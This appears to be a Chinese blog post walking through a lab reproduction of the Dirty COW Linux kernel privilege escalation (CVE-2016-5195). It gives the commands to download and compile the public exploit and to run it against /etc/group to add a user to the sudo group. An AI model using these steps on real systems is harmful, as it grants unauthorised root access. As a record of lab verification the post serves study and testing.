Dirty_cow

fnfil7weiel684kgy

(Dirty COW)


本地搭建实验环境:

本地 虚拟机:kali linux 2.0(内核4.6)


 

1. service ssh start

  1. ssh 用户名@localhost
    1和2 开启ssh通道 ,不会开启linux 的ssh 请自行百度
    3. wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c

    下载 exp
    4  gcc -pthread dirtyc0w.c -o dirtyc0w

    编译生成 dirtyc0w.c
    5 ./dirtyc0w /etc/group “$(sed ‘/(sudo*)/ s/$/,用户名/‘ /etc/group)”

    执行 提权代码
    6. exit

    退出当前用户
    7. sudo  su

    提权超级用户权限
    8. cat /etc/group |grep sudo

    使用这命令参数来查看这个group下的 sudo的用户权限 ,我们可以对比下提权前和提权后的用户权限

nwh2n3i2d2c2rf8f7 828y2_eqkh74ydsi

最后发现 demon这个用户已经是管理员的权限了

(对比用户的权限)

kp42vt9wggwus_r65 z3fyksfkof62zskpf

提权后的用户权限:

7ubpru7wnuhf3_rw65l9

提权之前 和提权之后的权限对比:

4ggqwflijo_xsrkx83i5fnfil7weiel684kgy

并附上黑手kali 也同样:

20161024_224010-624x1081

 

参考资料:http://www.secist.com/archives/1489.html 【漏洞预警】CVE-2016-5195脏牛漏洞:Linux内核通杀提权漏洞(10.21 13:41更新)

以上视频都是在Eternal群主发出这些文章不久后录制的,就想着手工验证一下,录制比较随意,大伙就凑合着看吧.本人菜鸟,若是哪里不妥,及时在即刻群@我,我一定及时更正完善该文章,谢谢!

 

demon 2016.10.31 更